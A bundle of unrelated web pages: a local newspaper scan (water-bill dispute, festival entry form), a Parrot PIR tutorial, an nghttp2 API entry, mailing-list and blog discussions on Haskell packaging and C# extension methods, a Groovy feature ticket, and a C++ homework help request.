Albert Karsky presented his water bill and asked commissioners to reconsider the amount charged. He was charged approximately $1,680 for 607,000 gallons of water. The figures, which showed up in his October bill, reflected a slow leak, since several times during the past six months his meter was either not read or registered incorrectly at zero. The city manager has agreed to look into the problem. Commissioners will decide how to administer the bill at the next council meeting.
FANNING SPRINGS FESTIVAL OF LIGHTS, 18th Annual
FANNING SPRINGS STATE PARK, FANNING SPRINGS, FLORIDA
DECEMBER 9, 2006

EVENTS INCLUDE: Arts, Crafts, Amusement Rides, Christmas Boat Parade, Rubber Ducky Race, Classic Car Show, Santa Claus, Good Food, Games, Motorcycle Showcase, Special Country & Gospel Music, Christmas Carols. Drawings for prizes donated by local merchants and much more.

NAME ___ ADDRESS ___ TEL. ___ FAX ___ E-MAIL ___
(Only so many 110V electric hookups available; apply early, or provide own generator)
DEADLINE TO ENTER: December 4, 2006

ARTS & CRAFTS ENTRY $35.00. TYPE ___. Absolutely NO commercial arts & crafts permitted. No. of booths (15'x15') ___. Need electric? (110V only) Yes / No

FOOD CONCESSION ENTRY $100.00. TYPE ___. Need electric? (110V only) Yes / No. No. of booths (15'x15') ___. Send picture, copies of insurance & permits, & menu.

BOAT PARADE ENTRY $20.00. Length of boat ___ Type ___. 1st, 2nd & 3rd place winners in small, medium and large categories. Parade @ 6:30 PM.

I will provide my own insurance and other business needs. I and my associates will hold harmless the Fanning Springs Chamber of Commerce and Festival of Lights, and all those associated with it in any manner whatsoever, including but not limited to accidents & theft. I will abide by all Festival and State Park rules and regulations. No knives, guns & ammo, or fireworks permitted. Signature ___

Mail to: Fanning Springs Chamber of Commerce & Festival of Lights, 17456 NW US Hwy 19, Fanning Springs, FL 32693 (send stamped envelope for confirmation).

Sponsored by: Fanning Springs Greater Chamber of Commerce, Festival of Lights, Inc. Committee, City of Fanning Springs and Progress Energy. Phone 352-463-9089 or 352-463-7919 for information. Visit us @ www.fanningspringsflorida.com, e-mail: fanningspringschamber@masn.com. "COME CELEBRATE WITH US"

Apply for HELP, the HOLIDAY EXPRESS LOAN PROGRAM. JACKSON HEWITT TAX SERVICE. Call 1-800-234-1040 or visit 102 N. MAIN ST.
CHIEFLAND, 352-493-2855. OPEN NOW, LOCATED IN CHIEFLAND RIGHT NEXT TO BELL'S FAMILY RESTAURANT. [Loan-terms fine print largely illegible in the scanned original; recoverable fragments mention a loan provided by HSBC Bank USA, N.A., Jackson Hewitt fees deducted from loan proceeds, availability at participating locations, and that most offices are independently owned and operated.]

© 2004 - 2011 University of Florida George A. Smathers Libraries. All rights reserved.
http://ufdc.ufl.edu/UF00028309/00096
Parrot Virtual Machine/Parrot Intermediate Representation

Parrot Intermediate Representation

The Parrot Intermediate Representation (PIR) is similar in many respects to the C programming language: it is higher-level than assembly language, but still very close to the underlying machine. The benefit of using PIR is that it is easier to program in than PASM, while still exposing all of the low-level functionality of Parrot. PIR has two purposes in the world of Parrot. The first is to serve as a target for automatic code generators from high-level languages. Compilers for high-level languages emit PIR code, which can then be interpreted and executed. The second is to be a low-level, human-readable programming language in which basic components and Parrot libraries can be written. In practice, PASM exists only as a human-readable direct translation of Parrot's bytecode, and is rarely used by humans to program in directly. PIR is used almost exclusively to write low-level software for Parrot.

PIR Syntax

PIR syntax is similar in many respects to older programming languages such as C or BASIC. In addition to PASM-like operations, there are control structures and arithmetic operations which simplify the syntax for human readers. All PASM is legal PIR code; PIR is little more than an overlay of friendlier syntax over the raw PASM instructions. When available, you should always use PIR's syntax instead of PASM's for ease of reading and writing. Even though PIR has more features and better syntax than PASM, it is not itself a high-level language. PIR is still very low-level and is not really intended for building large systems. So many other tools are available to language and application designers on Parrot that PIR only needs to be used in a small subset of areas. Eventually, enough tools might be created that PIR never needs to be used directly.
PIR and High-Level Languages

PIR is designed to help implement higher-level languages such as Perl, TCL, Python, Ruby, and PHP. As we've discussed before, high-level languages (HLLs) are related to PIR in two possible ways:

- We write a compiler for the HLL using the language NQP and the Parrot Compiler Tools (PCT). This compiler is then converted to PIR, and then to Parrot bytecode.
- We write code in the HLL and compile it. The compiler converts the code into a tree-like intermediate representation called PAST, then to another representation called POST, and finally to PIR code. From here, the PIR can be interpreted directly, or it can be further compiled to Parrot bytecode.

PIR, therefore, has features that help to enable writing compilers, and it also has features that support the HLLs that are written using those compilers.

Similarly to Perl, PIR uses the "#" symbol to start comments. Comments run from the # until the end of the current line. PIR also allows the use of POD documentation in files. We'll talk about POD in more detail later.

Subroutines

Subroutines start with the .sub directive, and end with the .end directive. We can return values from a subroutine using the .return directive. Here is a short example of a function that takes no parameters and returns an approximation of π:

    .sub 'GetPi'
        $N0 = 3.14159
        .return($N0)
    .end

Notice that the subroutine name is written in single quotes. This isn't a requirement, but it's very helpful and should be done whenever possible. We'll discuss the reasons for this below.

Subroutine Calls

There are two methods to call a subroutine: direct and indirect. In a direct call, we call a specific subroutine by name:

    $N1 = 'GetPi'()

In an indirect call, however, we call a subroutine using a string that contains the name of that subroutine:

    $S0 = 'GetPi'
    $N1 = $S0()

The problem arises when we start to use named variables (which we will discuss in more detail below).
Consider the following snippet where we have a local variable called "GetPi":

    GetPi = 'MyOtherFunction'
    $N0 = GetPi()

In this snippet, do we call the function "GetPi" (since we made the call GetPi()) or do we call the function "MyOtherFunction" (since the variable GetPi contains the value 'MyOtherFunction')? The short answer is that we would call the function "MyOtherFunction", because local variable names take precedence over function names in these situations. However, this is a little confusing, isn't it? To avoid this confusion, there are some conventions that people use to make this easier. By sticking with these conventions, we avoid all possible confusion later on.

Subroutine Parameters

Parameters to a subroutine can be declared using the .param directive. Here are some examples:

    .sub 'MySub'
        .param int myint
        .param string mystring
        .param num mynum
        .param pmc mypmc

In a parameter declaration, the .param directives must be at the top of the function. You may not put comments or other code between the .sub and .param directives.

Named Parameters

Parameters that are passed in a strict order like we've seen above are called positional arguments. Positional arguments are differentiated from one another by their position in the function call. Putting positional arguments in a different order will produce different effects, or may cause errors. Parrot supports a second type of parameter, a named parameter. Instead of being passed by their position in the argument list, parameters are passed by name and can be in any order. Here's an example:

    .sub 'MySub'
        .param int yrs :named("age")
        .param string call :named("name")
        $S0 = "Hello " . call
        $S1 = "You are " . yrs
        $S1 = $S1 . " years old"
        print $S0
        print $S1
    .end

    .sub main :main
        'MySub'("age" => 42, "name" => "Bob")
    .end

In the example above, we could have easily reversed the order too:

    .sub main :main
        'MySub'("name" => "Bob", "age" => 42) # Same!
    .end

Named arguments can be a big help because you don't have to worry about the exact order of variables, especially as argument lists get very long.

Optional Parameters

Functions may declare optional parameters, which the caller may or may not specify. To do this, we use the :optional and :opt_flag modifiers:

    .sub 'Foo'
        .param int bar :optional
        .param int has_bar :opt_flag

In this example, the parameter has_bar will be set to 1 if bar was supplied by the caller, and will be 0 otherwise. Here is some example code that takes two numbers and adds them together. If the second argument is not supplied, the first number is doubled:

    .sub 'AddTogether'
        .param num x
        .param num y :optional
        .param int has_y :opt_flag
        if has_y goto ive_got_y
        y = x
      ive_got_y:
        $N0 = x + y
        .return($N0)
    .end

And we will call this function with:

    'AddTogether'(1.0, 1.5) # returns 2.5
    'AddTogether'(3.0)      # returns 6.0

Slurpy Parameters

A subroutine can take any number of arguments, which can be loaded into an array. Parameters which can accept a variable number of input arguments are called :slurpy parameters. Slurpy arguments are loaded into an array PMC, and you can loop over them inside your function if you wish. Here is a short example:

    .sub 'PrintList'
        .param pmc list :slurpy
        print list
    .end

    .sub 'PrintOne'
        .param pmc item
        print item
    .end

    .sub main :main
        PrintList(1, 2, 3) # Prints "1 2 3"
        PrintOne(1, 2, 3)  # Prints "1"
    .end

Slurpy parameters absorb the remainder of all function arguments. Therefore, a slurpy parameter should only be the last parameter of a function. Any parameters after a slurpy parameter will never take any values, because all arguments passed for them will get absorbed by the slurpy parameter instead.

Flat Argument Arrays

If you have an array PMC that contains data for a function, you can pass in the array PMC. The array itself will become a single parameter which will be loaded into a single array PMC in the function.
However, if you use the :flat keyword when calling a function with an array, it will pass each element of the array into a different parameter. Here is an example function:

    .sub 'ExampleFunction'
        .param pmc a
        .param pmc b
        .param pmc c
        .param pmc d :slurpy

We have an array called x that contains three Integer PMCs: [1, 2, 3].

Variables

Local Variables

Local variables can be defined using the .local directive, using a similar syntax as is used with parameters:

    .local int myint
    .local string mystring
    .local num mynum
    .local pmc mypmc

In addition to local variables, in PIR you can use the registers for data storage as well.

Namespaces

Namespaces are constructs that allow the reuse of function and variable names without causing conflicts with previous incarnations. Namespaces are also used to keep the methods of a class together, without causing naming conflicts with functions of the same names in other namespaces. They are a valuable tool in promoting code reuse and decreasing naming pollution. In PIR, namespaces are specified with the .namespace directive. Namespaces may be nested using a key structure:

    .namespace ["Foo"]
    .namespace ["Foo";"Bar"]
    .namespace ["Foo";"Bar";"Baz"]

The root namespace can be specified with an empty pair of brackets:

    .namespace []   # Right! Enters the root namespace
    .namespace      # WRONG! Brackets are required!

Strings

Strings are a fundamental datatype in PIR, and are incredibly flexible. Strings can be specified as quoted literals, or as "Heredoc" literals in the code.

Heredocs

Heredoc string literals have become a common tool in modern programming languages to specify very long multi-line string literals. Perl programmers will be familiar with them, but so will most shell programmers and even modern .NET programmers too. Here is how a Heredoc works in PIR:

    $S0 = << "TAG"
    This is part of the Heredoc string.
    Everything between the '<< "TAG"' is treated
    as a literal string constant.
    This string ends when the parser
    finds the end marker.
    TAG

Heredocs allow long multi-line strings to be entered without having to use lots of messy quotes and concatenation operations.

Encodings and Charsets

Quoted string literals can be specified to be encoded in a specific character set or encoding.

File Includes

You can include an external PIR file into your current file using the .include directive. For example, if we wanted to include the file "MyLibrary.pir" into our current file, we would write:

    .include "MyLibrary.pir"

Notice that the .include directive is a raw text-substitution function. A file of PIR code is not self-contained the way you might expect from some other languages. For instance, one problem that occurs relatively commonly among new users is the concept of namespace overflow. Consider two files, A.pir and B.pir: the .namespace directive from file A overflows into file B, which is counterintuitive for most programmers.

Classes and Methods

We'll devote a lot of time to talking about classes and object-oriented programming later on in this book. However, since we've already talked about namespaces and subroutines a little bit, we can lay some groundwork for those later discussions. A class in PIR consists of a namespace for that class, an initializer, a constructor, and a series of methods. A "method" is exactly the same as an ordinary subroutine except for three differences:

- It has the :method flag
- It is called using "dot notation": Object.Method()
- The object that is used to call the method (on the left side of the dot) is stored in the "self" variable in the method.

To create a class, we first need to create a namespace for that class. In the most simple classes, we create the methods.
We will talk about initializers and constructors later, but for now we'll stick to a simple class that uses neither of these:

    .namespace ["MathConstants"]

    .sub 'GetPi' :method
        $N0 = 3.14159
        .return($N0)
    .end

    .sub 'GetE' :method
        $N0 = 2.71828
        .return($N0)
    .end

With this class (which we probably store in "MathConstants.pir" and include into our main file), we can write the following things:

    .local pmc mathconst
    mathconst = new 'MathConstants'
    $N0 = mathconst.'GetPi'() # $N0 contains the value 3.14159
    $N1 = mathconst.'GetE'() # $N1 contains the value 2.71828

We'll explain more of the messy details later, but this should be enough to get you started.

Control Statements

PIR is a low-level language and so it doesn't support any of the high-level control structures that programmers may be used to. PIR supports two types of control structures: conditional and unconditional branches. Unconditional branches are handled by the goto instruction. Conditional branches use the goto command also, but accompany it with an if or unless statement. The jump is only taken if the if-condition is true or the unless-condition is false.

HLL Namespace

Each HLL compiler has a namespace that is the same as the name of that HLL. For instance, if we were programming a compiler for Perl, we would create the namespace .namespace ["Perl"]. If we are not writing a compiler, but instead writing a program in pure PIR, we would be in the default namespace .namespace ["Parrot"]. To create a new HLL compiler, we would use the .HLL directive to set the current default HLL namespace:

    .HLL "mylanguage", "mylanguage_group"

Everything that is in the HLL namespace is visible to programs written in that HLL. For example, if we have a PIR function "Foo" that is in the "PHP" namespace, a program written in PHP can call the Foo function as if it were a regular PHP function. This may sound a little bit complicated.
To simplify, we can write simply .namespace (without the brackets) to return to the current HLL namespace.

Multimethods

Multimethods are groups of subroutines which share the same name. For instance, the subroutine "Add" might have different behavior depending on whether it is passed a Perl 5 floating-point value, a Parrot BigNum PMC, or a Lisp ratio. Multiple-dispatch subroutines are declared like any other subroutine in PIR, except they also have the :multi flag. When a multi is invoked, Parrot loads the MultiSub PMC object with the same name, and starts to compare parameters. Whichever subroutine has the best match to the given parameter list gets invoked. The best-match routine is relatively advanced: Parrot uses a Manhattan distance to order subroutines by their closeness to the given list, and then invokes the subroutine at the top of the list. When sorting, Parrot takes into account roles and multiple inheritance. This makes it incredibly powerful and versatile.

MultiMethods, MultiSubs, and other keywords

The vocabulary on this page might start to get a little bit complicated. Here, we will list a few terms which are used to describe things in Parrot.

- Subroutine - A basic block of code with a name and a parameter list.
- Method - A basic block of code which belongs to a particular class and can be called on an object of that class. Methods are just subroutines with an extra implicit self parameter.
- Multi Dispatch - Where multiple subroutines have the same name, and Parrot selects the best one to invoke.
- Single Dispatch - Where there is only one subroutine with the given name, and Parrot does not need to do any fancy sorting or selecting.
- MultiSub - A PMC type that stores a collection of subroutines which can be invoked by name and sorted/searched by Parrot.
- MultiMethod - Same as a MultiSub, except it is called as a method instead of a subroutine.
PIR Macros and Constants

PIR allows a text-replacement macro functionality, similar in concept (but not in implementation) to that used by C's preprocessor. PIR does not have preprocessor directives that support conditional compilation.

Macro Constants

Constant values can be defined with the .macro_const keyword. Here is an example:

    .macro_const PI 3.14

    .sub main :main
        print .PI # Prints "3.14"
    .end

A .macro_const can be an integer constant, a floating point constant, a string literal, or a register name. Here's another example:

    .macro_const MyReg S0
    .macro_const HelloMessage "hello world!"

    .sub main :main
        .MyReg = .HelloMessage
        print .MyReg
    .end

This allows you to give names to common constants, strings, or registers.

Macros

Basic text-substitution macros can be created using the .macro and .endm keywords to mark the start and end of the macro respectively. Here is a quick example:

    .macro SayHello
        print "Hello!"
    .endm

    .sub main :main
        .SayHello
        .SayHello
        .SayHello
    .end

This example, as should be obvious, prints out the word "Hello!" three times. We can also give our macros parameters, to be included in the text substitution:

    .macro CircleCircumference(r)
        $N0 = r * 3.14
        $N0 = $N0 * 2
        print $N0
    .endm

    .sub main :main
        .CircleCircumference(5)
        .CircleCircumference(10)
    .end

Macro Local Variables

What if we want to define a temporary variable inside the macro? Here's an idea:

    .macro PrintSomething
        .local string something
        something = "This is a message"
        print something
    .endm

    .sub main :main
        .PrintSomething
        .PrintSomething
    .end

After we do the text substitution, we get this:

    .sub main :main
        .local string something
        something = "This is a message"
        print something
        .local string something
        something = "This is a message"
        print something
    .end

After the substitution, we've declared the variable something twice!
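PIR's fix for this collision, .macro_local, generates a unique name for each expansion, as the next section shows. The renaming idea itself can be sketched in Python; the helper below is illustrative (not part of Parrot), though the name format deliberately mirrors the expansion shown in the text:

```python
import itertools

# Illustrative sketch of macro-local name mangling: build a unique name
# from the enclosing sub, the macro, the variable, and a per-expansion
# counter, so repeated expansions of the same macro never collide.
_counter = itertools.count(1)

def expand_macro_local(sub_name, macro_name, var_name):
    return "%s_%s_%s_%d" % (sub_name, macro_name, var_name, next(_counter))

a = expand_macro_local("main", "PrintSomething", "something")
b = expand_macro_local("main", "PrintSomething", "something")
print(a)  # main_PrintSomething_something_1
print(b)  # main_PrintSomething_something_2
```

Because each expansion draws a fresh counter value, the two generated declarations are distinct, which is exactly the property the doubled .local declaration above lacks.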
Instead of that, we can use the .macro_local declaration to create a variable with a unique name that is local to the macro:

    .macro PrintSomething
        .macro_local something
        something = "This is a message"
        print something
    .endm

Now, the same function translates to this after the text substitution:

    .sub main :main
        .local string main_PrintSomething_something_1
        main_PrintSomething_something_1 = "This is a message"
        print main_PrintSomething_something_1
        .local string main_PrintSomething_something_2
        main_PrintSomething_something_2 = "This is a message"
        print main_PrintSomething_something_2
    .end

Notice how the local variable declarations are now unique: they depend on the name of the enclosing sub, the name of the macro, and other information from the file. This is a reusable approach that doesn't cause any problems.

Resources
https://en.wikibooks.org/wiki/Parrot_Virtual_Machine/Parrot_Intermediate_Representation
nghttp2_session_create_idle_stream

Synopsis

    #include <nghttp2/nghttp2.h>

    int nghttp2_session_create_idle_stream(nghttp2_session *session, int32_t stream_id, const nghttp2_priority_spec *pri_spec)

Creates an idle stream with the given stream_id and priority pri_spec. The stream creation is done without sending a PRIORITY frame, which means that the peer does not know about the existence of this idle stream in the local endpoint.

RFC 7540 does not disallow the creation of an idle stream with an odd or even stream ID, regardless of client or server, so this function can create a stream with either. But it is probably a bit safer to use the stream IDs the local endpoint can initiate (in other words, odd stream IDs for a client, and even stream IDs for a server), to avoid potential collision from the peer's instruction. We can also use nghttp2_session_set_next_stream_id() to avoid accidentally opening created idle streams if we follow this recommendation.

If session is initialized as a server, and pri_spec->stream_id points to an idle stream, that idle stream is created if it does not exist. The created idle stream will depend on the root stream (stream 0) with weight 16. Otherwise, if the stream denoted by pri_spec->stream_id is not found, we use the default priority instead of the given pri_spec; that is, we make the stream depend on the root stream with weight 16.

This function returns 0 if it succeeds, or one of the following negative error codes:

- NGHTTP2_ERR_NOMEM: Out of memory.
- NGHTTP2_ERR_INVALID_ARGUMENT: Attempted to depend on itself; or the stream denoted by stream_id already exists; or stream_id cannot be used to create an idle stream (in other words, the local endpoint has already opened a stream ID greater than or equal to the given stream ID); or stream_id is 0.
https://nghttp2.org/documentation/nghttp2_session_create_idle_stream.html
I'm working on a Haskell binding for AntTweakBar, a light user interface for OpenGL applications (). I have three questions about how to organize it as a Haskell package or packages, Cabal, and darcs. First, since AntTweakBar provides support for handling events from GLUT, GLFW, and SDL, as well as customizable event handling from other sources, would it be best to divide it into four packages -- AntTweakBar (core), AntTweakBar-GLUT, AntTweakBar-GLFW, and AntTweakBar-SDL? A few other "package groups" on Hackage have taken this approach of splitting according to the user interface: for example, grapefruit-ui-gtk, reactive-glut, though not on such a large scale as I am proposing. Advantages of four packages rather than one: -- Fewer build dependencies, for example, for users who want to use just SDL and not have to install GLUT or GLFW. -- If one of the build dependencies is broken (as for example GLFW is just at the moment with the latest OpenGL), users could still build the other AntTweakBar-* packages. Disadvantages: -- More packages to install, for those who want it all. -- I might seem to be grabbing an undue share of the package namespace. And it could get way out of hand if I further split the examples from the library, making AntTweakBar-(base|GLUT|GLFW|SDL)-(lib|examples) = 8 packages! Would that be a problem? -- Possible inconvenience for the developer (see second question). Second question, assuming the four-way split is the best way to package this: my impression is that a directory can have only one cabal package file and one Setup.hs file. (, "Creating a Package") So for example I could not have, in the same directory, AntTweakBar.cabal, AntTweakBar-GLUT.cabal, etc. That means the four packages would each have to have their own directories, and it is sometimes inconvenient to be jumping back and forth between them. Any good way around that? Third question, assuming four separate directories for the four Cabal package files. 
Putting all four into one darcs repo (i.e., the darcs repo would have one main directory and a subdirectory for each package) seems to make it easier to coordinate development of the related packages -- for example, a single 'darcs rec -a' takes care of recording the related changes in all four subdirectories. Any reason not to do it that way? -- ___ ___ __ _ / _ \ / _ \| | | | Gregory D. Weber, Associate Professor / /_\// / | | | /\ | | Indiana University East / /_\\/ /__| | |/ \| | \____/\_____/\___/\__/ Tel. (765) 973-8420; FAX (765) 973-8550
http://www.haskell.org/pipermail/haskell-cafe/2009-August/064890.html
This will help you estimate the cost of running a JupyterHub for your purposes. Costs vary along many dimensions, such as the cloud provider used, the location from which you're running machines, and the types of machines you require.

Below are the standard prices for a Google Cloud instance running from Oregon. They should give you a general idea of how much your hub will cost. Here's a list of available machine types. For more information see the Google Cloud pricing guide.

    from z2jh import cost_display, disk, machines
    machines

Next, run this cell to determine your cost. It will display a widget that lets you draw a pattern of typical usage (you can control the amount of time that is shown with the n_days parameter). Play around with different machine configurations to see how this would affect the cost of your deployment.

    fig = cost_display(n_days=7)
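The kind of estimate the widget produces boils down to multiplying an hourly machine rate by usage hours. A minimal standalone sketch of that arithmetic follows; the machine types and hourly prices here are illustrative assumptions, not actual Google Cloud rates, so check the pricing guide for real numbers:

```python
# Illustrative hourly prices (assumed, not real Google Cloud rates).
HOURLY_PRICE_USD = {
    "n1-standard-2": 0.095,
    "n1-standard-4": 0.19,
}

def monthly_cost(machine_type, n_machines, hours_per_day, days_per_month=30):
    """Estimate the monthly cost of keeping `n_machines` instances of
    `machine_type` running `hours_per_day` hours each day."""
    rate = HOURLY_PRICE_USD[machine_type]
    return rate * n_machines * hours_per_day * days_per_month

# e.g. two 4-vCPU machines running 8 hours a day:
print(round(monthly_cost("n1-standard-4", 2, 8), 2))
```

This ignores disk, network, and sustained-use discounts, all of which the real pricing pages cover; it is only meant to show why usage pattern (hours per day) dominates the estimate.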
https://nbviewer.jupyter.org/github/jupyterhub/zero-to-jupyterhub-k8s/blob/master/doc/ntbk/draw_function.ipynb
Interesting discussion that came up on the ALT.NET list. Many people simply say "don't do that," but extension methods have a time and place and should be weighed like any other architectural or API decision. While I find that many people will misuse this feature to extremes, and code will quickly become unmaintainable, I can understand the possible benefits of them (especially in the context of LINQ). So my #1 best practice for extension methods? ALL extension methods should be [SIDE EFFECT FREE FUNCTIONS].

I wish that the C# compiler would enforce this rule and not let you create an extension method that was not side-effect free, but unfortunately this is not the case. Extension methods that change state are quite evil.

What do you see as best practices?

Most valued one: not to use extension methods at all. This hack can be needed for API designers, but there is no point in having extension methods in regular code.

#1 rule: avoid if possible. Use existing OO techniques to extend types if possible. Extension methods == last resort.
#2 rule: just like any other code, look for reuse. See if there's an existing standard library of extension methods that solves your problem.

One interesting use of extension methods is the one I mention here: forums.microsoft.com/.../ShowPost.aspx. That is, use extension methods to extend enums for purposes such as converting to strings for the UI. However, in the WPF world I would simply use a converter or data template scoped at the application level. It would make more sense for methods unrelated to UI.

PS. Change state of what? The extension target object? Or global state? The former I don't see a problem with. The latter makes me shudder.
The namespace should only contain the extension method classes and any other classes used by the extension methods. For example, don't put your favorite "System.String" extension methods (.ToAlternatingCase) in the "System" namespace, put it in "System.String.Extensions" or something similar. The namespace should be explicit to both the user writing the code and the user reading the code 6 months later exactly what extensions are being brought in simply by looking at the using statements. But the bug question is... why? Extension methods can only hit public properties/metods. So if an extension method changes an object via it's public properties, hows that different than something else that changes an object through it's public properties? A side effect free function is one that does not change the state of the object it is called on ... it can however return me a new object. A great (and silly) example of a side effect free function would be ... DateTime ThirtyDaysFromNow(DateTime Date) { return Date.AddDays(30); } I think that no extension method should ever try to change the state of the object its working on ... if it wants to do such a state transition it should be returning me a new object (leaving my original object in its original state) ... This is a very common pattern in functional programming and the places where extension methods have the most use is in functional situations (linq)... Peter. Welcome to the group of us who hope spec# makes it into 4.0 :) Great post.... my thoughts exactly. I believe that extensions will be grossly over used. Give a man a hammer, everything becomes a nail. Kent I have seen *maybe* 1 use of extension methods that included mutable methods and was actually something that would survive for 10 seconds in a code review ... It was making a fluent interface on objects that did not have one .... 
Personally I think this should be done with a facade (and everything becomes more explicit/controlled), but I can understand the desire to do such things. I have not really seen any valid mutable extension methods. Since the main use of extension methods is within what is, for all intents and purposes, functional code, it seems to me a good idea to follow well-established functional behaviors. Cheers, G
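The side-effect-free discipline the thread converges on can be sketched outside C# as well. Below is a minimal Java rendering of the ThirtyDaysFromNow example; the class and method names are illustrative, and since Java has no extension methods this is a plain static helper that returns a new value instead of mutating its argument:

```java
import java.time.LocalDate;

public final class Dates {

    private Dates() {}

    // Side-effect free: the input is never modified; a new value is returned.
    // LocalDate is immutable, which makes the contract trivial to honor.
    public static LocalDate thirtyDaysFromNow(LocalDate date) {
        return date.plusDays(30);
    }

    public static void main(String[] args) {
        LocalDate original = LocalDate.of(2007, 11, 19);
        LocalDate shifted = Dates.thirtyDaysFromNow(original);
        System.out.println(original + " -> " + shifted);
    }
}
```

The rule the thread proposes — an extension method may compute and return, never mutate its target — falls out naturally when the types involved are immutable.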
http://codebetter.com/blogs/gregyoung/archive/2007/11/19/extension-method-best-practices.aspx
Description: This functionality is already available via Collection#sum(Closure), as shown here:

def nums = 1..10
def squaresAndCubesOfEvens = nums.sum{ it % 2 ? [] : [it**2, it**3] }
assert squaresAndCubesOfEvens == [4, 8, 16, 64, 36, 216, 64, 512, 100, 1000]

However, the name sum is not intuitive in all scenarios, and sum is not always the most efficient way to concatenate such lists, as it directs through the Groovy 'plus' operator to allow custom overriding of 'plus'. The intention is to provide a collectMany "alias" for sum which is more efficient and has naming similar to C#'s Enumerable.SelectMany operator.

Issue Links: is duplicated by GROOVY-6443, Add "flatCollect{}" method as a shorthand for collect{}.flatten()
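For readers coming from the Java side, the proposed collectMany corresponds to flatMap on Java streams (just as it mirrors C#'s SelectMany): each element maps to zero or more elements, and the results are flattened. A sketch of the same squares-and-cubes-of-evens example (class and method names are illustrative):

```java
import java.util.List;
import java.util.stream.IntStream;
import java.util.stream.Stream;

public class CollectManyDemo {

    // flatMap plays the role of Groovy's proposed collectMany:
    // odd numbers contribute nothing, even numbers contribute two elements.
    public static List<Integer> squaresAndCubesOfEvens(int from, int to) {
        return IntStream.rangeClosed(from, to).boxed()
                .flatMap(n -> n % 2 != 0
                        ? Stream.<Integer>empty()
                        : Stream.of(n * n, n * n * n))
                .toList();
    }

    public static void main(String[] args) {
        System.out.println(squaresAndCubesOfEvens(1, 10));
        // [4, 8, 16, 64, 36, 216, 64, 512, 100, 1000]
    }
}
```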
http://jira.codehaus.org/browse/GROOVY-4932?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
Would somebody please assist me? I have been doing consistent trial and error with my counter. You see, when the program cannot locate an item (which is typed at the bottom) it displays "Sorry, no such item number exists, please enter another one or 0 to stop." Every time I try to locate the first few items it loops back into the same message, whereas when I type the last item number on the list, it can locate it... And if I type a 0 in when it can't locate the number, the total adds up to a really high number. I don't understand why this occurs, but if someone would like to help, I'd be happy. *Please note that arrays or tables CANNOT be used.

#include<iostream>
#include<iomanip>
#include<fstream>
using namespace std;

int main()
{
    //Declare files
    ifstream infile;
    ofstream outfile;

    //Create an output text file named "Sales"
    outfile.open("Sales.txt");

    //Declare variables that are entered from user
    int itemNumber = 0;
    int quantity = 0;
    float paid = 0.0;

    //Formula variables
    int counter = 0;
    float totalCost = 0.0;
    float tax = 0.0;
    float totalForAll = 0.0;
    float taxForAll = 0.0;
    float change = 0.0;

    //Variables that are received from the text file "Stocks"
    int partNumber = 0;
    const int SIZE = 81;
    char description[SIZE];
    float price = 0.0;

    //Ask user for the item number
    cout << "Please enter the item number of the product, type 0 to stop ";
    cout << "inputting numbers \n" << "and print the receipt.\n";
    cout << "Item #: ";
    cin >> itemNumber;

    while (itemNumber != 0)
    {
        //Open the Stock.txt file
        infile.open("Stock.txt");

        //Use a loop to test each part number and see if it is found
        for(counter = 9; itemNumber != 0; counter--)
        {
            //Get partNumber from the file
            infile >> partNumber;
            infile >> description;
            infile >> price;

            //If it finds a match to the part number
            if(itemNumber == partNumber)
            {
                //Then write them to the output file "Sales"
                outfile << "Item Number: ";
                outfile << partNumber << endl;
                outfile << "Description: ";
                outfile << description << endl;
                outfile << "Price of Item: $";
                outfile << price << endl;

                //Show user the description and price
                cout << endl;
                cout << description << endl;
                cout << "Current Price: $" << price << endl;

                //Quantity, total cost 4 item, and Tax
                cout << endl;
                cout << "How many items of that product ";
                cout << "are there?\n";
                cout << "Quantity: ";

                //Input Quantity
                cin >> quantity;

                //Calculate total cost 4 the item
                totalCost = price * quantity;

                //Format accordingly
                cout << fixed << setprecision(2);
                cout << showpoint;
                outfile << fixed << setprecision(2);
                outfile << showpoint;

                //Write the cost before tax to "Sales"
                outfile << "Quantity: ";
                outfile << quantity << endl;
                outfile << "Total without Tax: $";
                outfile << totalCost << endl;

                //Tax
                tax = (totalCost * .08);

                //Write Tax
                outfile << "Tax: $";
                outfile << tax << endl;

                //Add Tax to the total cost and then write
                totalCost += tax;
                outfile << "Total with Tax: $";
                outfile << totalCost;
                outfile << endl << endl << endl;

                //Ask another item number, set counter = 10
                cout << endl << endl;
                cout << "Enter another item number, or ";
                cout << "type 0 to finish.\n";
                cout << "Item #: ";
                cin >> itemNumber;
                counter = 10;
                infile.close();
                infile.open("Stock.txt");
            } //End if for testing item number

            //If it can't locate the item number...
            if(counter < 1)
            {
                cout << endl;
                cout << "Sorry, no such item number exists, ";
                cout << "please enter another one or ";
                cout << "0 to stop.\n";
                cout << "Item #: ";
                cin >> itemNumber;
                counter = 10;
                infile.close();
                infile.open("Stock.txt");
            } //End if

            totalForAll += totalCost;
            taxForAll += tax;
        } //End repeat for testing item number

        //Close Stocks.txt
        infile.close();
    } //End the first repeat

    cout << endl << endl << endl;
    cout << "Total Tax: $" << taxForAll;
    outfile << "Total Tax: $" << taxForAll;
    cout << endl << endl;
    cout << "Total Due: $" << totalForAll << endl;
    outfile << endl << endl;
    outfile << "Total Due: $" << totalForAll;
    outfile << endl;
    cout << endl;
    cout << "Amount Paid: $";
    cin >> paid;

    //Write the amount paid
    outfile << endl;
    outfile << "Amount Paid: $";
    outfile << paid << endl;

    //Calculate change
    change = paid - totalForAll;
    if(change == 0.0 || change > 0.0)
    {
        cout << "Change: $" << change << endl;
        outfile << "Change: $" << change << endl;
    }

    //Doesn't display when change is = 0, problem comparing floats?
    if(change < -1.0)
    {
        change = change * -1; //Converts to positive
        cout << "The customer owes $" << change << "..." << endl;
        outfile << "The customer owes $" << change << "..." << endl;
    }

    outfile << "\nThank you for shopping @ FUNNY STUFF RETAIL INC.\n";
    cout << "\nThank you for shopping @ FUNNY STUFF RETAIL INC.\n";
    outfile.close();
    system("pause");
    return 0;
}

Stock.txt file contents

1234 Stockings 12.39
2865 Pajamas 17.99
4020 Dress 23.00
3640 Sweater 20.50
5109 Shorts 56.99
4930 TV 88.20
6600 ToothBrush 94.55
5020 AluminumPan 16.79
2336 Pencils 4.55
https://www.daniweb.com/programming/software-development/threads/353941/counter-error-in-my-code-can-t-figure-it-out
Posted 10 Jun 2015

